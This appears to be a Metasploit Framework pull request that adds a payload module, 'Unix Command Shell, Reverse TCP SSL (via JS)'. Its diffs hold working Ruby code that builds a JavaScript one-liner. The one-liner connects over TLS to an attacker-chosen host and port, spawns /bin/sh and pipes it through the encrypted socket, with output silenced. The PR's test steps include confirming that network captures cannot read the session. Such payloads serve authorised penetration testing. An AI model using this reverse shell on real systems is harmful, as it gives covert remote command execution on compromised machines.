### PR TITLE
JS reverse TCP SSL command shell

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_js_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_js_ssl.rb
@@ -1,0 +1,68 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Reverse TCP SSL (via JS)',
+      'Description'   => 'Creates an interactive shell via JS, uses SSL',
+      'Author'        => 'RageLtMan',
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'js',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    # Future proof for PrependEncoder
+    ret = super + command_string
+    # For copy-paste to files or other sessions
+    #vprint_good(ret)
+    return ret
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+
+ 		lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
+    cmd   = <<EOS
+var tls = require("tls"), spawn = require("child_process").spawn, util = require("util"), sh = spawn("/bin/sh",[]);
+var client = this;
+client.socket = tls.connect(#{datastore['LPORT']},"#{lhost}", function() {
+  client.socket.pipe(sh.stdin);
+  util.pump(sh.stdout,client.socket);
+  util.pump(sh.stderr,client.socket);
+});
+EOS
+    return "js -e '#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}' >/dev/null 2>&1 & "
+  end
+end
+

--- a/modules/payloads/singles/cmd/unix/reverse_js_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_js_ssl.rb
@@ -1,12 +1,3 @@
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
 require 'msf/core/handler/reverse_tcp_ssl'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -52,7 +43,7 @@ module MetasploitModule
   #
   def command_string
 
- 		lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
+    lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
     cmd   = <<EOS
 var tls = require("tls"), spawn = require("child_process").spawn, util = require("util"), sh = spawn("/bin/sh",[]);
 var client = this;


### PR DESCRIPTION
Does what it sounds like, runs a reverse TCP SSL carried shell
session spawned from the commandline via the js binary.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Ensure your test target has a js binary in the PATH environment variable accessible to the component being compromised
- [ ] Select your command session payload compatible exploit of choice
- [ ] `set PAYLOAD cmd/unix/reverse_js_ssl`
- [ ] ...
- [ ] **Verify** A valid session is created
- [ ] **Verify** Network capture of the session does not reveal its contents

